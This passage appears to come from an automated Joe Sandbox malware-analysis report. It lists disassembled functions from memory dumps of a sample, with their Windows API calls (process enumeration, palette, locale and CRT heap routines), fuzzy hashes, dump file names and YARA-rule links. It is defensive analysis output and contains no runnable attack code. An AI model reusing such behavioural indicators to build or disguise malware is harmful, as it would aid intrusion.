                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0BEB85A4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsDevice$CreateHalftonePaletteRelease
                                                                                  • String ID:
                                                                                  • API String ID: 2404249990-0
                                                                                  • Opcode ID: fb82123a9729f295fcd8f144a72a33f1ad834ecf58379ff28a6ed3ee71fc9665
                                                                                  • Instruction ID: 1afef1d2b77acb8baf012d45cce18e54cd216f893b19f73cf745cc7c1975a9f9
                                                                                  • Opcode Fuzzy Hash: fb82123a9729f295fcd8f144a72a33f1ad834ecf58379ff28a6ed3ee71fc9665
                                                                                  • Instruction Fuzzy Hash: 9A118131A422595EDF61EF249941FEF36D8AB51255F042111F8145A380E7B48DA8C3A1
                                                                                  Function 6A6D3B80 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 6A6FE2FD: __getptd.LIBCMT ref: 6A6FE302
                                                                                  • EnterCriticalSection.KERNEL32(6A72FC8C), ref: 6A6D3B91
                                                                                  • _rand.LIBCMT ref: 6A6D3BB0
                                                                                    • Part of subcall function 6A6FE30F: __getptd.LIBCMT ref: 6A6FE30F
                                                                                  • _rand.LIBCMT ref: 6A6D3BE0
                                                                                  • _rand.LIBCMT ref: 6A6D3C10
                                                                                  • LeaveCriticalSection.KERNEL32(6A72FC8C,6A732B70,0000000D,6A732B70,0000000C,6A732B70,0000000B), ref: 6A6D3C30
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _rand$CriticalSection__getptd$EnterLeave
                                                                                  • String ID:
                                                                                  • API String ID: 4188531936-0
                                                                                  • Opcode ID: 58ea094fa99780627d795ca86864577b6dfc32cc1859eba4e8e31544f1561416
                                                                                  • Instruction ID: 6fd2a4ae744a4ba0c20682050e9756b5ddbbc2c682aad4f98e13b4704dd487d6
                                                                                  • Opcode Fuzzy Hash: 58ea094fa99780627d795ca86864577b6dfc32cc1859eba4e8e31544f1561416
                                                                                  • Instruction Fuzzy Hash: 24118C771492608BC321A368868CF2BFAD6CFC9644B0B0874DE8597263CF20DC0386F9
                                                                                  Function 0BEB5FA8 Relevance: 7.6, APIs: 5, Instructions: 55windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 0BEB5FC0
                                                                                  • GetDeviceCaps.GDI32(?,00000068), ref: 0BEB5FDC
                                                                                  • GetPaletteEntries.GDI32(0E080E34,00000000,00000008,?), ref: 0BEB5FF4
                                                                                  • GetPaletteEntries.GDI32(0E080E34,00000008,00000008,?), ref: 0BEB600C
                                                                                  • ReleaseDC.USER32(00000000,?), ref: 0BEB6028
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: EntriesPalette$CapsDeviceRelease
                                                                                  • String ID:
                                                                                  • API String ID: 3128150645-0
                                                                                  • Opcode ID: e7db8ff0d494c78fc906366c4013aaf4e38bd99a6309a29746329a7f0b0fede4
                                                                                  • Instruction ID: 9445f228fabde51412505669345ff3b6e556b6c4b85caf1aada497edff930e4d
                                                                                  • Opcode Fuzzy Hash: e7db8ff0d494c78fc906366c4013aaf4e38bd99a6309a29746329a7f0b0fede4
                                                                                  • Instruction Fuzzy Hash: C31104716483046FEF51CBA59C42FAABBE8E748700F4080A1F5149A1C0EBB29948C320
                                                                                  Function 6A6DDAF0 Relevance: 7.6, APIs: 5, Instructions: 55processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,001F0FFF), ref: 6A6DDB0B
                                                                                  • _memset.LIBCMT ref: 6A6DDB3C
                                                                                  • Process32First.KERNEL32 ref: 6A6DDB52
                                                                                  • Process32Next.KERNEL32(00000000,00000000), ref: 6A6DDB6C
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6DDB7C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
                                                                                  • String ID:
                                                                                  • API String ID: 2526126748-0
                                                                                  • Opcode ID: 6d4a41673fa17df86b8299c9f0ccbcd06cef983d673ba703b964ea58f67c7482
                                                                                  • Instruction ID: f637fce7ab56923bc3e71a19c96e54e71e159ef8060cb161af5938a0308dc0ea
                                                                                  • Opcode Fuzzy Hash: 6d4a41673fa17df86b8299c9f0ccbcd06cef983d673ba703b964ea58f67c7482
                                                                                  • Instruction Fuzzy Hash: 7E010CF1506340ABE710EB65C849AEF33E4AFC6358F45092DE55486180EF749908CED6
                                                                                  Function 6A6F581B Relevance: 7.6, APIs: 5, Instructions: 54stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • lstrlenA.KERNEL32(?,?,?), ref: 6A6F5847
                                                                                  • _memset.LIBCMT ref: 6A6F5864
                                                                                  • GetWindowTextA.USER32(00000000,00000000,00000100), ref: 6A6F587E
                                                                                  • lstrcmpA.KERNEL32(00000000,?,?,?), ref: 6A6F5890
                                                                                  • SetWindowTextA.USER32(00000000,?), ref: 6A6F589C
                                                                                    • Part of subcall function 6A6EE232: __CxxThrowException@8.LIBCMT ref: 6A6EE248
                                                                                    • Part of subcall function 6A6EE232: __EH_prolog3.LIBCMT ref: 6A6EE255
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 4273134663-0
                                                                                  • Opcode ID: 7cbf79e6bfbc7b732ac778f08a1626d98b5529e9d03c95299f61dbd381098f71
                                                                                  • Instruction ID: 33afa3843a6697c9fab4641b182c4ea3cc9247c4349cca53990da1abc13fc284
                                                                                  • Opcode Fuzzy Hash: 7cbf79e6bfbc7b732ac778f08a1626d98b5529e9d03c95299f61dbd381098f71
                                                                                  • Instruction Fuzzy Hash: 4B0100B2600224ABCB109AA5CC89FCF37EDAB59744F0000B1FA06D3140DF74DE458BA0
                                                                                  Function 0BE9E7D0 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetThreadLocale.KERNEL32(?,00000000,0BE9E867,?,?,00000000), ref: 0BE9E7E8
                                                                                    • Part of subcall function 0BE9E548: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0BE9E566
                                                                                  • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0BE9E867,?,?,00000000), ref: 0BE9E818
                                                                                  • EnumCalendarInfoA.KERNEL32(Function_0000E71C,00000000,00000000,00000004), ref: 0BE9E823
                                                                                  • GetThreadLocale.KERNEL32(00000000,00000003,Function_0000E71C,00000000,00000000,00000004,00000000,0BE9E867,?,?,00000000), ref: 0BE9E841
                                                                                  • EnumCalendarInfoA.KERNEL32(0BE9E758,00000000,00000000,00000003), ref: 0BE9E84C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Locale$InfoThread$CalendarEnum
                                                                                  • String ID:
                                                                                  • API String ID: 4102113445-0
                                                                                  • Opcode ID: 9377363e1906e492291253e9ee53dba17901c267e5de1429523a379cf6de6243
                                                                                  • Instruction ID: 000e1ec94b11a8390c744158435b642e2c6349d4050443510f6d29b24dec53ab
                                                                                  • Opcode Fuzzy Hash: 9377363e1906e492291253e9ee53dba17901c267e5de1429523a379cf6de6243
                                                                                  • Instruction Fuzzy Hash: 4C01F2306002047FEF21E6B4BC13B6E3698DB46B10F506670FA00E6AC0EA649E0D82B5
                                                                                  Function 6A704CDB Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 6A704CE7
                                                                                    • Part of subcall function 6A705883: __getptd_noexit.LIBCMT ref: 6A705886
                                                                                    • Part of subcall function 6A705883: __amsg_exit.LIBCMT ref: 6A705893
                                                                                  • __amsg_exit.LIBCMT ref: 6A704D07
                                                                                  • __lock.LIBCMT ref: 6A704D17
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 6A704D34
                                                                                  • InterlockedIncrement.KERNEL32(0D081668), ref: 6A704D5F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                  • String ID:
                                                                                  • API String ID: 4271482742-0
                                                                                  • Opcode ID: 8cd6622d127518ff257a369637cf18022b2f74c8b2001448c2236e5589ae208b
                                                                                  • Instruction ID: 695b5dc57d7fdc50162a5df5670326088bf71281f49b98e163c77265cc86cc17
                                                                                  • Opcode Fuzzy Hash: 8cd6622d127518ff257a369637cf18022b2f74c8b2001448c2236e5589ae208b
                                                                                  • Instruction Fuzzy Hash: 3F01D6B1940B11ABDB109B65D60CB4DBBF0EF96B28F020065E914A7281CF34AE49DFD1
                                                                                  Function 6A6FE26F Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __lock.LIBCMT ref: 6A6FE28D
                                                                                    • Part of subcall function 6A705EED: __mtinitlocknum.LIBCMT ref: 6A705F03
                                                                                    • Part of subcall function 6A705EED: __amsg_exit.LIBCMT ref: 6A705F0F
                                                                                    • Part of subcall function 6A705EED: EnterCriticalSection.KERNEL32(?,?,?,6A70F988,00000004,6A726F98,0000000C,6A706FD8,?,?,00000000,00000000,00000000,?,6A705835,00000001), ref: 6A705F17
                                                                                  • ___sbh_find_block.LIBCMT ref: 6A6FE298
                                                                                  • ___sbh_free_block.LIBCMT ref: 6A6FE2A7
                                                                                  • HeapFree.KERNEL32(00000000,?,6A726890,0000000C,6A705ECE,00000000,6A726C18,0000000C,6A705F08,?,?,?,6A70F988,00000004,6A726F98,0000000C), ref: 6A6FE2D7
                                                                                  • GetLastError.KERNEL32(?,6A70F988,00000004,6A726F98,0000000C,6A706FD8,?,?,00000000,00000000,00000000,?,6A705835,00000001,00000214), ref: 6A6FE2E8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                  • String ID:
                                                                                  • API String ID: 2714421763-0
                                                                                  • Opcode ID: 917cf93f3137ea90bd2c7512ae871064841a17f99c77c558542c187d3f8391cc
                                                                                  • Instruction ID: c60480b4457d7d83bc2d5de0baf7ba8cfb6fa6a91c3a271f90d03934b0393b2a
                                                                                  • Opcode Fuzzy Hash: 917cf93f3137ea90bd2c7512ae871064841a17f99c77c558542c187d3f8391cc
                                                                                  • Instruction Fuzzy Hash: 2601D671A46311AAEF205BB1DE0DB4E7FF59F03728F124419E410A7080EF38DA498A54
                                                                                  Function 6A6F4080 Relevance: 7.5, APIs: 5, Instructions: 36COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • TlsFree.KERNEL32(?,?,?,6A6F40E6), ref: 6A6F40A8
                                                                                  • GlobalHandle.KERNEL32(?), ref: 6A6F40B6
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 6A6F40BF
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6A6F40C6
                                                                                  • DeleteCriticalSection.KERNEL32(?,?,?,6A6F40E6), ref: 6A6F40D0
                                                                                    • Part of subcall function 6A6F3ECA: EnterCriticalSection.KERNEL32(6A72CFE8,?,6A72CFCC,6A72CFE8,6A72CFCC,?,6A6F3FA9,00000000,00000000,?,?,?,?,6A6F02CE,00000000,00000000), ref: 6A6F3F29
                                                                                    • Part of subcall function 6A6F3ECA: LeaveCriticalSection.KERNEL32(6A72CFE8,00000000,?,6A6F3FA9,00000000,00000000,?,?,?,?,6A6F02CE,00000000,00000000,000000FF,00000010,6A6EE047), ref: 6A6F3F39
                                                                                    • Part of subcall function 6A6F3ECA: LocalFree.KERNEL32(?,?,6A6F3FA9,00000000,00000000,?,?,?,?,6A6F02CE,00000000,00000000,000000FF,00000010,6A6EE047,?), ref: 6A6F3F42
                                                                                    • Part of subcall function 6A6F3ECA: TlsSetValue.KERNEL32(6A72CFCC,00000000,?,6A6F3FA9,00000000,00000000,?,?,?,?,6A6F02CE,00000000,00000000,000000FF,00000010,6A6EE047), ref: 6A6F3F54
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
